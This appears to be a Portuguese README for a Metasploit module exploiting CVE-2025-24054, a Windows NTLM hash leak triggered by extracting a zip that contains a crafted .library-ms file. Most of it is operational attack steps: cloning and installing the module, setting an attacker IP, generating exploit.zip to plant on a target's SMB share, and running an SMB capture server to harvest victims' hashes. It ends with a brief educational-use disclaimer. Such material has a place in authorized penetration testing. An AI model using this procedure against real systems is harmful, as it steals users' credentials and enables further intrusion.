
Módulo do Metasploit para explorar CVE-2025-24054 (ex 24071). Exploit de vazamento NTLM integrado ao Metasploit para vetores de ataque baseados em bibliotecas do Windows.
A vulnerabilidade ocorre durante o processo de extração de um arquivo .zip. Ao interagir com um arquivo .library-ms especialmente projetado, o Explorador de Arquivos do Windows processa o esquema XML interno e inicia automaticamente uma solicitação de autenticação SMB para um caminho remoto controlado pelo atacante.
Esse comportamento permite a exfiltração do hash NTLM do usuário sem exigir interação adicional além da descompactação do arquivo. Para ver uma prova de conceito, recomendo visitar o seguinte link: Fluffy - HTB.
Embora originalmente essa vulnerabilidade tenha sido divulgada como CVE-2025-24071, atualmente é rastreada oficialmente como CVE-2025-24054.
Clonar o repositório:
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071
Copiar o módulo para o diretório do Metasploit:
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
Se o diretório não existir, crie-o com:
❯ mkdir -p ~/.msf4/modules/auxiliary/server/
Em seguida, copie o módulo novamente.
Iniciar o Metasploit e carregar o módulo:
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak
Se o módulo carregar corretamente, você verá as opções para configurá-lo:
❯ show options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes IP do atacante (onde roda Responder/Impacket)
FILENAME exploit.zip yes O nome do arquivo ZIP
LIBRARY_NAME documents.library-ms yes Nome do arquivo .library-ms
SHARE_NAME recurso yes Nome do recurso compartilhado fictício
Configure o módulo e execute:
❯ set ATTACKER_IP 0.0.0.0 # Reemplaza con tu IP atacante
❯ set FILENAME exploit.zip # Nombre del payload que subiras al SMB (equipo objetivo)
❯ set LIBRARY_NAME malicious.library-ms # Nombre de .library-ms file
❯ set SHARE_NAME it_shared # Nombre del recurso SMB
❯ run
Saída: o módulo gera um arquivo .zip que deve ser enviado ao servidor SMB alvo para posterior execução pela vítima
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed
Por último, use o módulo de captura SMB do Metasploit para receber os hashes NTLM:
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0 # Reemplaza con tu IP atacante
❯ run
Se você tiver problemas para levantar o servidor SMB pelo Metasploit:
Este módulo foi desenvolvido apenas para fins educacionais e de testes autorizados. O uso não autorizado desse tipo de ferramenta pode ser ilegal.
Security Layer